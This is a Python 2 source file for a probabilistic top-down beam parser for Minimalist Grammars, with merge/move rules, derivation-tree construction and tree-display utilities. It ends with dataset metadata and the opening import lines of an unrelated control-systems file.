m=[[]]*len(sA0)
mx=[[]]*len(sA0)
hx=[0,1,1]
m[2]=lA0[2]
mx[2]=[0,0]
dt = ([],[],[])
return ((h,m),(hx,mx),dt)
ic0 = testic0()
printIcat((sA0,lA0,tA0),ic0,dt)
"""
"""
Now consider minheaps. Lists also have a min function
l1=[4,1,3,2]
min(l1)
But insert/extract_min are O(n) on lists, and much faster for heaps.
l1=[4,1,3,2]
heapq.heapify(l1)
The usual length and access-by-position still works:
len(l1)
l1[0]
l1[1]
More importantly, we can pop the minimum element, and
push new elements:
heapq.heappop(l1)
len(l1)
safe_l1 = l1[:]
len(safe_l1)
heapq.heappop(l1)
len(l1)
len(safe_l1)
heapq.heappop(safe_l1)
heapq.heappush(l1,0)
heapq.heappop(l1)
heapq.heappop(l1)
heapq.heappop(l1)
heapq.heappop(l1)
"""
"""
Since heapq is not set up to let us define what counts as "least",
we will put (minIndex,ic) pairs onto the heap, so popq will give
us the predicted indexed category ic with the smallest index,
using the standard ordering.
minIndex should only check indices of filled mover positions.
No mover has an empty index, so we can ignore them.
"""
def minIndex(((h,m),(hx,mx),dt)):
min = hx
for x in mx:
if x<>[] and x<min:
min=x
return min
def printIQ(lexArrays,iq):
for (i,ic) in iq:
printIcat(lexArrays,ic)
print '... end ic'
"""
example:
exactly as before, but now with (min_index,ic) elements,
using ic0 defined above:
iq0 = [(minIndex(ic0),ic0)]
heapq.heapify(iq0)
len(iq0)
printIQ(lexArrays0,iq0)
heapq.heappush(iq0,(minIndex(ic0),ic0))
len(iq0)
printIQ(lexArrays0,iq0)
"""
def printIQ(lexArrays,iq):
for (i,ic,d) in iq: # d is "dtuple" for this indexed category
printIcat(lexArrays,ic)
print '... end ic'
"""
For the queue of parses, we put the probability first, and negate it,
(-probability,input,iq)
so the most probable element will be the most negative, and hence the
minimal element popped at each step.
"""
"""
Our last preparatory steps are the utilities for building the
derivation tree. Gorn adresses for each node of the derivation tree
are stored during the parse, together with the lexical labels of the
leaves. From these, we can compute the standard form of the derivation tree.
"""
def splitDnodes(nontermsSofar,termsSoFar,dns):
for dn in dns:
if isinstance(dn,tuple): # a terminal is a pair (node,terminal string list)
termsSoFar.append(dn)
else:
nontermsSofar.append(dn) # node is an integer list
def child(n1,n2): # boolean: is n1 a prefix of n2? If so: n2 is a child of n1
return n1 == n2[0:len(n1)]
# build the derivation tree that has parent as its root, and return it
def buildIDtreeFromDnodes(parent,nodes,terminals,t):
if len(terminals)>0 and min(terminals)[0]==parent:
leaf = heapq.heappop(terminals)
t.append(leaf[1])
elif len(nodes)>0 and child(parent,min(nodes)):
root = heapq.heappop(nodes)
t.append(['.']) # place-holder
t = t[-1]
child0 = buildIDtreeFromDnodes(root,nodes,terminals,t)
if len(nodes)>0 and child(parent,min(nodes)):
t[0]='*' # replace place-holder
root1 = heapq.heappop(nodes)
child1 = buildIDtreeFromDnodes(root1,nodes,terminals,t)
else:
t[0]='o' # replace place-holder
else:
raise RuntimeError('buildIDtreeFromDnodes: error')
return t
"""
example:
t000 = []
root00 = []
nts00 = [[0],[0,0],[0,1],[1],[1,0]]
heapq.heapify(nts00)
ts00 = [([0,0],[('the',[(0,0)])]), ([0,1],[('bird',[(0,0)])]), ([1,0],[('sings',[(0,0)])])]
heapq.heapify(ts00)
t00 = []
t000 = buildIDtreeFromDnodes(root00,nts00,ts00,t00)
pptree(t000)
"""
def dNodes2idtree(dns):
nonterms = []
terms = []
splitDnodes(nonterms,terms,dns)
if len(nonterms) == 0:
raise RuntimeError('buildIDtreeFromDnodes: error')
else:
heapq.heapify(nonterms)
heapq.heapify(terms)
root = heapq.heappop(nonterms)
t = buildIDtreeFromDnodes(root,nonterms,terms,[])
if len(terms)<>0 or len(nonterms)<>0:
print 'dNodes2idtree error: unused derivation steps'
print 'terms=',terms
print 'nonterms=',nonterms
return t
"""
Now to the guts of the parser.
For the queue of parses, we put the probability first, and negate it,
(-probability,input,iq)
so the most probable element will be the most negative, and hence the
minimal element popped at each step.
"""
def printDQ(lexArrays,dq):
for (p,inpt,iq,dns) in dq: # dns is the dnode list
print p,': ',' '.join(inpt)
printIQ(lexArrays,iq)
print ' ---- end parse'
"""
dq0=[(-0.1,['this','is','the','input'],iq0)]
heapq.heapify(dq0)
printDQ(lexArrays0,dq0)
heapq.heappush(dq0,(-0.1,['this','is','the','input'],iq0))
len(dq0)
printDQ(lexArrays0,dq0)
"""
def emptyListArray(m):
result = True
for e in m:
if e<>[]:
result = False
return result
"""
Check to make sure the mover array (or any array)
consists only of empty lists
example:
emptyListArray([[],[],[]])
emptyListArray([[],[],[1]])
"""
def terminalsOf(ts):
terms=[]
nonterms=[]
for t in ts:
if len(t)>0 and isinstance(t[0],tuple):
nonterms.append(t)
else:
terms.append(t)
return (terms,nonterms)
"""
Divide the list of trees ts into the terminals (lexical elements)
and the nonterminals
example: terminalsOf(lA0[0])
"""
"""
prefixT(w,input) returns (True,n) if input[:n]=w
else returns (False,0) if w not a prefix of input
"""
def prefixT(w,lst):
if w==lst[0:len(w)]:
return (True,len(w))
else:
return (False,0)
"""
memberFval(i,lst) returns (True,t) if t is an element of lst such that
root of t is (type,i); else (False,[) if no match
"""
def memberFval(i,lst):
for pos,e in enumerate(lst):
if e[0][1]==i:
return (True,lst[pos])
return (False,[])
"""
Now the parsing steps: scan, merge1/2/3/4, move1/2
"""
def scan(w,inpt,m,mx,dt,sofar):
if emptyListArray(sofar):
(ok,remainderInt) = prefixT(w,inpt)
if ok:
exp = (w,[(([],m),([],mx),dt)]) # unlike recognizer, we return w here
sofar.append(exp)
# merge a (non-moving) complement
def merge1(lA,inpt,terms,i,((h,m),(hx,mx),dt),sofar): # dt=(ifs,dx,mifs)
if terms <> []:
new_head_index=hx[:]
new_head_index.append(0)
new_comp_index=hx[:]
new_comp_index.append(1)
empty_m = [[]]*len(m)
empty_mx = [[]]*len(mx)
ifs = dt[0][:] # copy
ifs.append((1,i)) # extend ifs
dx = dt[1][:] # copy
dx.append(0) # extend dx
empty_mifs = [[]]*len(m)
dt1 = (ifs,dx,empty_mifs)
ic1 = ((terms,empty_m),(new_head_index,empty_mx),dt1) # no movers to lexical head
new_ifs = [(0,i)]
new_dx = dt[1][:] # copy
new_dx.append(1) # extend new_dx
mifs = dt[2][:] # copy
dt2 = (new_ifs,new_dx,mifs) # movers to complement
ic2 = ((lA[i],m),(new_comp_index,mx),dt2) # movers to complement only
exp = ([],[ic1,ic2])
sofar.append(exp)
# merge a (non-moving) specifier
def merge2(lA,inpt,nonterms,i,((h,m),(hx,mx),dt),sofar): # dt=(ifs,dx,mifs)
if nonterms <> []:
new_head_index=hx[:]
new_head_index.append(1)
new_comp_index=hx[:]
new_comp_index.append(0)
empty_m = [[]]*len(m)
empty_mx = [[]]*len(mx)
ifs = dt[0][:] # copy
ifs.append((1,i)) # extend ifs
dx = dt[1][:] # copy
dx.append(0) # extend dx
mifs = dt[2][:] # copy
dt1 = (ifs,dx,mifs)
ic1 = ((nonterms,m),(new_head_index,mx),dt1) # movers to head
new_ifs = [(0,i)]
new_dx = dt[1][:] # copy
new_dx.append(1) # extend new_dx
empty_mifs = [[]]*len(m)
dt2 = (new_ifs,new_dx,empty_mifs)
ic2 = ((lA[i],empty_m),(new_comp_index,empty_mx),dt2) # no movers to spec
exp = ([],[ic1,ic2])
sofar.append(exp)
# merge a (moving) complement
def merge3(inpt,terms,i,((h,m),(hx,mx),dt),sofar):
if terms <> []:
for nxt in range(len(m)):
(ok,matchingTree) = memberFval(i,m[nxt])
if ok:
ts = matchingTree[1:]
tsx = mx[nxt]
ifs0 = dt[2][nxt][:]
empty_m = [[]]*len(m)
empty_mx = [[]]*len(mx)
empty_mifs = [[]]*len(m)
n = m[:]
nx = mx[:]
nifs = dt[2][:] # copy
n[nxt] = [] # we used the "next" licensee, so now empty
nx[nxt] = []
nifs[nxt] = []
ifs = dt[0][:] # copy
ifs.append((1,i)) # extend ifs with (sel i)
dx = dt[1][:] # copy
dx.append(0) # extend dx
dt1 = (ifs,dx,empty_mifs)
ic1 = ((terms,empty_m),(hx,empty_mx),dt1)
ifs0.append((0,i)) # add (cat i) feature
new_dx = dt[1][:] # copy
new_dx.append(1) # extend new_dx
dt2 = (ifs0,new_dx,nifs) # movers to complement
ic2 = ((ts,n),(tsx,nx),dt2) # movers passed to complement
exp = ([],[ic1,ic2])
sofar.append(exp)
# merge a (moving) specifier
def merge4(inpt,nonterms,i,((h,m),(hx,mx),dt),sofar):
if nonterms <> []:
for nxt in range(len(m)):
(ok,matchingTree) = memberFval(i,m[nxt])
if ok:
ts = matchingTree[1:]
tsx = mx[nxt]
ifs0 = dt[2][nxt][:] # copy
empty_m = [[]]*len(m)
empty_mx = [[]]*len(mx)
empty_mifs = [[]]*len(m)
n = m[:]
nx = mx[:]
nifs = dt[2][:]
n[nxt] = [] # we used the "next" licensee, so now empty
nx[nxt] = []
nifs[nxt] = []
ifs = dt[0][:] # copy
ifs.append((1,i)) # extend ifs
dx = dt[1][:] # copy
dx.append(0) # extend dx
dt1 = (ifs,dx,nifs)
ic1 = ((nonterms,n),(hx,nx),dt1)
ifs0.append((0,i))
new_dx = dt[1][:] # copy
new_dx.append(1) # extend new_dx
dt2 = (ifs0,new_dx,empty_mifs)
ic2 = ((ts,empty_m),(tsx,empty_mx),dt2) # movers passed to complement
exp = ([],[ic1,ic2])
sofar.append(exp)
def move1(lA,inpt,ts,i,((h,m),(hx,mx),dt),sofar):
if m[i] == []: # SMC
n = m[:]
nx = mx[:]
n[i] = lA[i]
nx[i] = hx[:]
nx[i].append(0)
new_head_index=hx[:]
new_head_index.append(1)
ifs = dt[0][:] # copy
ifs.append((3,i)) # extend ifs with (pos i)
dx = dt[1][:] # copy
dx.append(0) # extend dx
mifs = dt[2][:] # copy
mifs[i] = [(2,i)] # begin new mover with (neg i)
dt1 = (ifs,dx,mifs)
ic1 = ((ts,n),(new_head_index,nx),dt1)
exp = ([],[ic1])
sofar.append(exp)
def move2(inpt,ts,i,((h,m),(hx,mx),dt),sofar):
for nxt in range(len(m)):
(ok,matchingTree) = memberFval(i,m[nxt])
if ok:
rootF = matchingTree[0][1] # value of rootLabel
if rootF==nxt or m[rootF]==[]: # SMC
mts = matchingTree[1:][:]
mtsx = mx[nxt][:]
ifs0 = dt[2][nxt][:]
n = m[:]
nx = mx[:]
nifs = dt[2][:]
n[nxt] = [] # we used the "next" licensee, so now empty
nx[nxt] = []
nifs[nxt] = []
n[rootF] = mts
nx[rootF] = mtsx
ifs0.append((2,i)) # extend prev ifs of mover with (neg i)
nifs[rootF] = ifs0
ifs = dt[0][:]
ifs.append((3,i)) # extend ifs with (pos i)
dx = dt[1][:]
dx.append(0) # extend dx
dt1 = (ifs,dx,nifs)
ic1 = ((ts,n),(hx,nx),dt1)
exp = ([],[ic1])
sofar.append(exp)
"""
The following function collects all expansion of the leftmost
indexed category ((h,m),(hx,mx),dt) popped off the iq of predictions
that pops off dq -- the most probable derivation
"""
def exps((sA,lA,tA),inpt,((h,m),(hx,mx),dt),sofar):
for t in h:
if len(t)>0 and isinstance(t[0],tuple):
if t[0][0] == 1: # feature type 1 is 'sel'
i = t[0][1] # set i to feature value
(terms,nonterms)= terminalsOf(t[1:])
merge1(lA,inpt,terms,i,((h,m),(hx,mx),dt),sofar)
merge2(lA,inpt,nonterms,i,((h,m),(hx,mx),dt),sofar)
merge3(inpt,terms,i,((h,m),(hx,mx),dt),sofar)
merge4(inpt,nonterms,i,((h,m),(hx,mx),dt),sofar)
elif t[0][0] == 3: # feature type 3 is 'pos'
i = t[0][1] # set i to feature value
ts = t[1:]
move1(lA,inpt,ts,i,((h,m),(hx,mx),dt),sofar)
move2(inpt,ts,i,((h,m),(hx,mx),dt),sofar)
else:
raise RuntimeError('exps')
else:
scan(t,inpt,m,mx,dt,sofar)
# unlike recognizer, we pass in inpt, because now scan returns w
# and all other rules return [] as first element of exp pair
def insertNewParses(inpt,p,new_p,q,dq,dns0,exps):
for exp in exps:
# scan is a special case, identifiable by empty head
# (w,[(([],m),([],mx),(ifs,dx,mifs))]) <-- we check for that empty head
if exp[1][0][0][0]==[]:
dns = dns0[:]
w = exp[0]
ifs = exp[1][0][2][0][:] # copy
ifs.reverse()
dx = exp[1][0][2][1]
dns.append((dx,(w,ifs)))
(ok,remainderInt) = prefixT(w,inpt) # unlike recognizer, we compute remainder again
newParse = (p,inpt[remainderInt:],q,dns)
heapq.heappush(dq,newParse)
else: # put indexed categories ics onto iq with new_p
ics = exp[1]
safe_q=q[:]
dns = dns0[:]
for ic in ics: # ic = ((h,m),(hx,mx),(ifs,dx,mifs))
dx = ic[2][1]
dns.append(dx)
newIndex=minIndex(ic)
heapq.heappush(safe_q,(newIndex,ic))
newParse = (new_p,inpt,safe_q,dns)
heapq.heappush(dq,newParse)
"""
This is the core function: it pops the most probable parse,
pops the leftmost prediction from that parse,
expands that prediction in all possible ways,
pushes the new parses into the queue, and repeats,
until success or failure.
"""
def derive(lexArrays,minP,dq): # modify this to return dq, so alternative parses can be found
p = 1.0
# while len(dq) > 0 and len(dq) < 2000:
while len(dq) > 0:
# printDQ(lexArrays,dq)
(p,inpt,iq,dns) = heapq.heappop(dq)
print '# of parses in beam=',len(dq)+1,', p(best parse)=',(-1 * p)
if len(iq)==0 and len(inpt)==0:
print 'parse found'
return dns # success!
elif len(iq) > 0:
prediction = heapq.heappop(iq)
ic = prediction[1]
sofar = []
exps(lexArrays,inpt,ic,sofar)
if len(sofar) > 0:
new_p = p / float(len(sofar))
if new_p < minP:
insertNewParses(inpt,p,new_p,iq,dq,dns,sofar)
else:
print 'improbable parses discarded'
print 'no parse found'
return [[],([],(['no parse'],[]))] # failure!
"""
Convert the integer representation of features back to
the string representations for the derivation tree
"""
def idtree2dtree(sA,t):
if t[0]=='*':
dt0 = idtree2dtree(sA,t[1])
dt1 = idtree2dtree(sA,t[2])
return ['*',dt0,dt1]
elif t[0]=='o':
dt0 = idtree2dtree(sA,t[1])
return ['o',dt0]
elif isinstance(t,list) and len(t)==1:
dt0 = idtree2dtree(sA,t[0])
return dt0
else: # leaf t has the form (w,ifs)
return (t[0],[fOfInts(sA,f) for f in t[1]])
"""
Convert the derivation tree with string features
into a "beautified' derivation tree for display
"""
def dt2t(t):
if t[0]=='*':
dt0 = dt2t(t[1])
dt1 = dt2t(t[2])
return ['*',dt0,dt1]
elif t[0]=='o':
dt0 = dt2t(t[1])
return ['o',dt0]
else: # leaf t has the form (w,ifs)
return (t[0],[btfyFeat(f) for f in t[1]])
"""
Initialize and start the parse
"""
def parse(lex,start,minP,inpt): # initialize and begin
sA = stringValsOfG(lex)
(lA,tA) = gIntoLexArrayTypeArray(sA,lex)
startInt = intsOfF(sA,('cat',start))[1]
h = lA[startInt]
m = [[]]*len(sA)
mx = [[]]*len(sA)
ifs = [(0,startInt)] # for derivation tree, (int) features checked so far
dx = [] # for derivation tree, Gorn address of the current node (int list)
mifs = [[]]*len(sA) # for derivation tree, (int) features checked by each mover
dt = (ifs,dx,mifs) # dt = dtuple for derivation tree
ic = ((h,m),([],mx),dt)
iq = [([],ic)]
heapq.heapify(iq)
dq = [(-1.0,inpt,iq,[[]])]
heapq.heapify(dq)
t0 = time.time()
dns = derive((sA,lA,tA),minP,dq)
# print 'dns=',dns
t1 = time.time()
idtree = dNodes2idtree(dns)
# print 'idtree =',idtree
# print 'calling idtree2dtree(sA,',idtree,')'
dt = idtree2dtree(sA,idtree)
print t1 - t0, "seconds"
return dt
"""
these examples use merge1, merge2, merge3, move1
inpt0=['which','wine','the','queen','prefers']
parse(mg0,'C',0.001,inpt0)
inpt0=['which','wine','prefers','the','wine']
parse(mg0,'C',0.001,inpt0)
inpt0=['which','wine','the','queen','prefers']
parse(mg0,'C',0.001,inpt0)
inpt0=['the','king','knows','which','wine','the','queen','prefers']
parse(mg0,'C',0.001,inpt0)
these examples use merge1, merge2, merge4, move1
inpt0=['the','king','knows','which','queen','prefers','the','wine']
parse(mg0,'C',0.001,inpt0)
the queen says the king knows which queen prefers the wine
inpt0=['the','queen','says','the','king','knows','which','queen','prefers','the','wine']
parse(mg0,'C',0.001,inpt0)
inpt0=['a','a']
parse(mgxx,'T',0.001,inpt0)
"""
"""
Now we define some read-parse loops
"""
def go1(lex,start,minP): # initialize and begin
sA = stringValsOfG(lex)
(lA,tA) = gIntoLexArrayTypeArray(sA,lex)
gA = (sA,lA,tA)
startInt = intsOfF(sA,('cat',start))[1]
h = lA[startInt]
m = [[]]*len(sA)
mx = [[]]*len(sA)
ifs = [(0,startInt)] # for derivation tree
dx = [] # for derivation tree
mifs = [[]]*len(sA) # for derivation tree
dt = (ifs,dx,mifs) # for derivation tree
ic = ((h,m),([],mx),dt) # dt = dtuple for derivation tree
iq = [([],ic)]
heapq.heapify(iq)
goLoop(lex,(sA,lA,tA),iq,minP)
def goLoop(g,gA,iq,minP):
new_iq = iq[:]
inpt = ' '
while len(inpt)>0 and inpt[0] != 'q':
ans = raw_input(': ')
inpt = ans.split()
if len(inpt)>0 and inpt[0] == 'q':
sys.exit()
elif len(inpt)>0 and inpt[0] == 'l':
TreeView(list2nltktree(['.']+lexArrays2stringTrees(gA)))
elif len(inpt)>0 and inpt[0] == 'pl':
showGrammar(g)
else:
dq = [(-1.0,inpt,new_iq,[[]])]
heapq.heapify(dq)
go2(g,gA,iq,minP,dq)
sys.exit()
def go2(g,gA,iq,minP,dq):
t0 = time.time()
dns = derive(gA,minP,dq)
t1 = time.time()
idtree = dNodes2idtree(dns)
dt = idtree2dtree(gA[0],idtree)
print t1 - t0, "seconds"
ans = ''
while ans != 'quit':
ans = str(raw_input('(h for help): '))
if len(ans)>0 and ans[0] == 'h':
hlp()
elif len(ans)>0 and ans[0] == 'd':
list2nltktree(dt2t(dt)).draw()
elif len(ans)>0 and ans[0] == 's':
list2nltktree(st2t(dt2st(dt))).draw()
elif len(ans)>0 and ans[0] == 'b':
list2nltktree(bt2t(dt2bt(dt))).draw()
elif len(ans)>0 and ans[0] == 'x':
list2nltktree(dt2xb(dt)).draw()
elif len(ans)>0 and ans[0] == 'l':
list2nltktree(['.']+lexArrays2stringTrees(gA)).draw()
elif len(ans)>0 and ans[0] == 'n':
goLoop(g,gA,iq,minP)
elif len(ans)>0 and ans[0] == ';':
go2(g,gA,iq,minP,dq)
elif len(ans)>1 and ans[:2] == 'pd':
pptree(dt2t(dt))
elif len(ans)>1 and ans[:2] == 'ps':
pptree(st2t(dt2st(dt)))
elif len(ans)>1 and ans[:2] == 'pb':
pptree(bt2t(dt2bt(dt)))
elif len(ans)>1 and ans[:2] == 'px':
pptree(dt2xb(dt))
elif len(ans)>1 and ans[:2] == 'pg':
print
showGrammar(g)
print
elif len(ans)>1 and ans[:2] == 'pl':
pptree(['.']+lexArrays2stringTrees(gA))
elif len(ans)>0 and ans[0] == 'q':
sys.exit()
# ans = 'quit'
sys.exit()
def hlp():
print ' d for derivation tree'
print ' s for state tree'
print ' b for bare tree'
print " x for X' tree"
print ' l show the grammar as a tree'
print ' ; to search for another parse of this same input'
print ' n to type in next input'
print ' q for quit'
print
print 'or for line mode interaction:'
print ' pd for pretty-printed derivation tree'
print ' ps for pretty-printed state tree'
print ' pb for pretty-printed bare tree'
print " px for pretty-printed X' tree"
print ' pl pretty-print the grammar as a tree'
print ' pg print the grammar as a list of items'
print
"""
convert derivation tree to state tree
"""
# remember:
# fs[0] = head features, fs[0][0] = 1st feature of head, fs[0][0][0] = type of 1st feature
def merge_check(fs0,fs1):
if fs0[0][0][0] == 'sel' and fs1[0][0][0] == 'cat' and fs0[0][0][1] == fs1[0][0][1]:
newfs = [fs0[0][1:]] # remaining head1 features
if fs1[0][1:] <> []: # any remaining features from head2? If so, they're movers
newfs.append(fs1[0][1:])
newfs.extend(fs0[1:]) # add movers1
newfs.extend(fs1[1:]) # add movers2
return newfs
else:
raise RuntimeError('merge_check error')
def getMover(f,moverFeatureLists):
mover = []
remainder = []
for moverFeatureList in moverFeatureLists:
if moverFeatureList[0][1] == f:
if mover == []: # OK if we did not already find an f
mover = [moverFeatureList[1:]] # put remainder into singleton list
else: # if we find 2 f's, there is an SMC violation
raise RuntimeError('SMC violation in move_check')
else: # put others back into remainder list
remainder.extend(moverFeatureList)
if mover == []:
raise RuntimeError('getMover error: no mover found')
else:
return (mover,remainder)
def move_check(fs0):
newfs = [fs0[0][1:]] # remaining head1 features
(mover,remainder) = getMover(fs0[0][0][1],fs0[1:])
if remainder<>[]: # put features of other movers back into list, if any
newfs.append(remainder)
if mover[0]<>[]: # if this mover is movign again, put it into list too
newfs.append(mover[0]) # extend movers1 with movers2
return newfs
# if we want just the state: dt2s
def dt2s(dt):
if isinstance(dt,tuple):
return [dt[1]] # the state of leaf (w,fs) is [fs]; root of tree [[fs]]
elif dt[0]=='*': # all other states result from feature checking
fs0 = dt2s(dt[1])
fs1 = dt2s(dt[2])
fs = merge_check(fs0,fs1)
return fs
elif dt[0]=='o':
fs0 = dt2s(dt[1])
fs = move_check(fs0)
return fs
def dt2st(dt):
if isinstance(dt,tuple):
return [[dt[1]]] # the state of leaf (w,fs) is [fs]; root of tree [[fs]]
elif dt[0]=='*': # all other states result from feature checking
t0 = dt2st(dt[1])
t1 = dt2st(dt[2])
fs = merge_check(t0[0],t1[0])
return [fs,t0,t1]
elif dt[0]=='o':
t0 = dt2st(dt[1])
fs = move_check(t0[0])
return [fs,t0]
def st2t(st):
if len(st)==3: # merge
sfs = ','.join([' '.join([btfyFeat(f) for f in fs]) for fs in st[0]])
t0 = st2t(st[1])
t1 = st2t(st[2])
return [sfs,t0,t1]
elif len(st)==2: # move
sfs = ','.join([' '.join([btfyFeat(f) for f in fs]) for fs in st[0]])
t0 = st2t(st[1])
return [sfs,t0]
else: # len(st)==1: # leaf
sfs = ','.join([' '.join([btfyFeat(f) for f in fs]) for fs in st[0]])
return [sfs]
"""
convert derivation tree to bare tree -
we modify dt2s, adding the bare trees and the list of moving trees.
"""
def dt2bt(dt):
(state,bt,movers) = dt2sbt(dt)
if movers <> []:
raise RuntimeError('dt2bt error')
else:
return bt
# remember:
# fs[0] = head features, fs[0][0] = 1st feature of head, fs[0][0][0] = type of 1st feature
def merge_checkBT(fs0,fs1,bt1,m):
if fs0[0][0][0] == 'sel' and fs1[0][0][0] == 'cat' and fs0[0][0][1] == fs1[0][0][1]:
newfs = [fs0[0][1:][:]] # copy remaining head1 features
newfs.extend(fs0[1:][:]) # add movers1
newfs.extend(fs1[1:][:]) # add movers2
if fs1[0][1:] <> []: # any remaining features from head2? If so, new mover
bt1m = ('',[]) # trace
newfs.append(fs1[0][1:])
m.append((fs1[0][1:],bt1))
else:
bt1m = bt1
return (newfs,bt1m)
else:
raise RuntimeError('merge_check error')
def getMoverBT(f,moverFeatureLists,treeList):
mover = []
remainder = []
remainderTrees = []
for fs in moverFeatureLists:
if fs[0][1] == f:
if mover == []: # OK if we did not already find an f
mover = [fs[1:]] # put remainder into singleton list
else: # if we find 2 f's, there is an SMC violation
raise RuntimeError('SMC violation in move_check')
else:
remainder.extend(fs)
for (fs,t) in treeList:
if fs[0][1] == f: # return copy of moving tree
moverTree = t[:]
else: # add copy of any other trees
remainderTrees.append((fs,t[:]))
return (mover,moverTree,remainder,remainderTrees)
def move_checkBT(fs0,m):
newfs = [fs0[0][1:]] # remaining head1 features
(mover,moverTree,remainder,remainderTrees) = getMoverBT(fs0[0][0][1],fs0[1:],m)
if remainder<>[]: # put other mover features back into list, if any
newfs.append(remainder)
if mover[0]<>[]: # if this mover is moving again, put it into list too
newfs.append(mover[0]) # extend movers1 with movers2
mt = ('',[]) # trace
remainderTrees.append((mover[0],moverTree))
else:
mt = moverTree
return (newfs,mt,remainderTrees)
def dt2sbt(dt): # compute (state,bt,moving) triple
if isinstance(dt,tuple):
return ([dt[1]],dt,[]) # the state of leaf (w,fs) is [fs]; root of tree [[fs]]
elif dt[0]=='*': # all other states result from feature checking
(fs0,bt0,m0) = dt2sbt(dt[1])
(fs1,bt1,m1) = dt2sbt(dt[2])
m = m0
m.extend(m1)
(fs,bt1m) = merge_checkBT(fs0,fs1,bt1,m) # may add additional mover to m
if isinstance(bt0,tuple):
bt = ['<',bt0,bt1m]
else:
bt = ['>',bt1m,bt0]
return (fs,bt,m)
elif dt[0]=='o':
(fs0,bt0,m0) = dt2sbt(dt[1])
(fs,mt,m) = move_checkBT(fs0,m0)
bt = ['>',mt,bt0]
return (fs,bt,m)
def bt2t(bt):
if isinstance(bt,tuple): # leaf
w = ' '.join(bt[0])
sfs = ' '.join([btfyFeat(f) for f in bt[1]])
item = '::'.join([w,sfs])
return item
elif len(bt)==3: # merge
t0 = bt2t(bt[1])
t1 = bt2t(bt[2])
return [bt[0],t0,t1]
elif len(bt)==2: # move
t0 = bt2t(bt[1])
return [bt[0],t0]
else:
raise RuntimeError('bt2t')
"""
convert derivation tree to X-bar tree -
similar to the bare tree conversion
"""
def dt2xb(dt):
# (state,xb,movers,cat,lexical,cntr) = dt2sxb(dt,0)
tple = dt2sxb(dt,0)
xb = tple[1]
movers = tple[2]
cat = tple[3]
scat = cat+'P'
xb[0] = scat
if movers <> []:
raise RuntimeError('dt2xb error')
else:
return xb
# remember:
# fs[0] = head features, fs[0][0] = 1st feature of head, fs[0][0][0] = type of 1st feature
def merge_checkXB(fs0,fs1,xb1,m,cat,cntr):
if fs0[0][0][0] == 'sel' and fs1[0][0][0] == 'cat' and fs0[0][0][1] == fs1[0][0][1]:
newfs = [fs0[0][1:][:]] # copy remaining head1 features
newfs.extend(fs0[1:][:]) # add movers1
newfs.extend(fs1[1:][:]) # add movers2
if fs1[0][1:] <> []: # any remaining features from head2? If so, new mover
scat = cat+'P('+str(cntr)+')'
cntr0 = cntr + 1
xb1m = ([scat],[]) # trace
newfs.append(fs1[0][1:])
xb1[0] = scat
m.append((fs1[0][1:],xb1))
else:
cntr0 = cntr
xb1m = xb1
return (newfs,xb1m,cntr0)
else:
raise RuntimeError('merge_check error')
def getMoverXB(f,moverFeatureLists,treeList):
mover = []
remainder = []
remainderTrees = []
for fs in moverFeatureLists:
if fs[0][1] == f:
if mover == []: # OK if we did not already find an f
mover = [fs[1:]] # put remainder into singleton list
else: # if we find 2 f's, there is an SMC violation
raise RuntimeError('SMC violation in move_check')
else:
remainder.extend(fs)
for (fs,t) in treeList:
if fs[0][1] == f: # return copy of moving tree
moverTree = t[:]
else: # add copy of any other trees
remainderTrees.append((fs,t[:]))
return (mover,moverTree,remainder,remainderTrees)
def move_checkXB(fs0,m):
newfs = [fs0[0][1:]] # remaining head1 features
(mover,moverTree,remainder,remainderTrees) = getMoverXB(fs0[0][0][1],fs0[1:],m)
if remainder<>[]: # put other mover features back into list, if any
newfs.append(remainder)
if mover[0]<>[]: # if this mover is moving again, put it into list too
newfs.append(mover[0]) # extend movers1 with movers2
mt = ('',[]) # trace
remainderTrees.append((mover[0],moverTree))
else:
mt = moverTree
return (newfs,mt,remainderTrees)
def catOf(fs):
for (ftype,f) in fs:
if ftype == 'cat':
return f[:]
def dt2sxb(dt,cntr): # compute (state,xb,moving) triple
if isinstance(dt,tuple):
cat = catOf(dt[1])
return ([dt[1]],[cat,dt[0]],[],cat,True,cntr)
elif dt[0]=='*': # all other states result from feature checking
(fs0,xb0,m0,cat0,lexical0,cntr0) = dt2sxb(dt[1],cntr)
(fs1,xb1,m1,cat1,lexical1,cntr1) = dt2sxb(dt[2],cntr0)
m = m0
m.extend(m1)
(fs,xb1m,cntr2) = merge_checkXB(fs0,fs1,xb1,m,cat1,cntr1) # may add additional mover to m
hcat = cat0+"'"
scat = cat1+'P'
if isinstance(xb1m,list): # a trace is a pair
xb1m[0] = scat
if lexical0:
xb = [hcat,xb0,xb1m]
else:
xb = [hcat,xb1m,xb0]
return (fs,xb,m,cat0,False,cntr2)
elif dt[0]=='o':
(fs0,xb0,m0,cat0,lexical0,cntr0) = dt2sxb(dt[1],cntr)
(fs,mt,m) = move_checkXB(fs0,m0)
hcat = cat0+"'"
xb = [cat0,mt,xb0]
return (fs,xb,m,cat0,False,cntr0)
"""
http://docs.python.org/library/functions.html#__import__
'Direct use of __import__() is rare, except in cases where you want to
import a module whose name is only known at runtime.'
"""
if len(sys.argv)<>4:
print '\nFound',len(sys.argv)-1,'parameters but',
print '3 parameters are required:'
print ' mgtdbp.py grammar startCategory minimumProbability\n'
print 'For example:'
print ' python mgtdbp.py mg0 C 0.0001'
print 'or:'
print ' python mgtdbp.py mgxx T 0.0000001\n'
print 'For line editing, you could use:'
print ' rlwrap python mgtdbp.py mg0 C 0.0001'
print 'or, if you have ipython:'
print ' ipython mgtdbp.py mg0 C 0.0001\n'
sys.exit()
# from the grammar specified in sys.argv[1], import *
grammar=__import__(sys.argv[1], globals(), locals(), ['*'])
# with mgxx, p=0.000000001 is small enough for: a b b b b a b b b b
# with mg0, p=0.0001 is small enough for:
# which king says which queen knows which king says which wine the queen prefers
go1(grammar.g,sys.argv[2],-1 * float(sys.argv[3]))
| 32.194444 | 97 | 0.565784 |
fb355ec4af64545004ee2e9654f74bb767e387f9 | 33,874 | py | Python | examples/ctrl/basic/lead_lag.py | pydae/pydae | 8076bcfeb2cdc865a5fc58561ff8d246d0ed7d9d | [
"MIT"
] | 1 | 2020-12-20T03:45:26.000Z | 2020-12-20T03:45:26.000Z | examples/ctrl/basic/lead_lag.py | pydae/pydae | 8076bcfeb2cdc865a5fc58561ff8d246d0ed7d9d | [
"MIT"
] | null | null | null | examples/ctrl/basic/lead_lag.py | pydae/pydae | 8076bcfeb2cdc865a5fc58561ff8d246d0ed7d9d | [
"MIT"
] | null | null | null | import numpy as np
import numba
import scipy.optimize as sopt
import json
sin = np.sin
cos = np.cos
atan2 = np.arctan2
